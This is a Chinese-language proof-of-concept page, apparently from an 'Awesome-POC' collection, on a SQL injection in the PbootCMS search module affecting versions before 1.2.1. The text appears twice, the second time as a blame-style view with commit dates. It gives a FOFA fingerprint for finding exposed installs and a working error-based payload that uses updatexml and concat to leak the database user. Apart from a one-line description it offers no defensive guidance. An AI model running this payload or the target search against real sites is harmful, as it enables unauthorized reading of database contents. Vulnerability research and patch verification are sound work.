Awesome-POC/CMS漏洞/PbootCMS search SQL注入漏洞.md

# PbootCMS search SQL注入漏洞

## 漏洞描述

PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

## 漏洞影响

```
PbootCMS < 1.2.1
```

## 网络测绘 

```
app="PBOOTCMS"
```

## 漏洞复现

搜索框页面为

![](./images/202202170924485.png)Payload为

```plain
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
```

![](./images/202202170924075.png)
update gitbook 2022-02-20 16:14:31 +08:00			`# PbootCMS search SQL注入漏洞`

			`## 漏洞描述`

			`PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息`

			`## 漏洞影响`

			```
			`PbootCMS < 1.2.1`
			```

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
update gitbook 2022-02-20 16:14:31 +08:00
			```
			`app="PBOOTCMS"`
			```

			`## 漏洞复现`

			`搜索框页面为`

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202170924485.png)Payload为`
update gitbook 2022-02-20 16:14:31 +08:00
			```plain
			`/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202170924075.png)`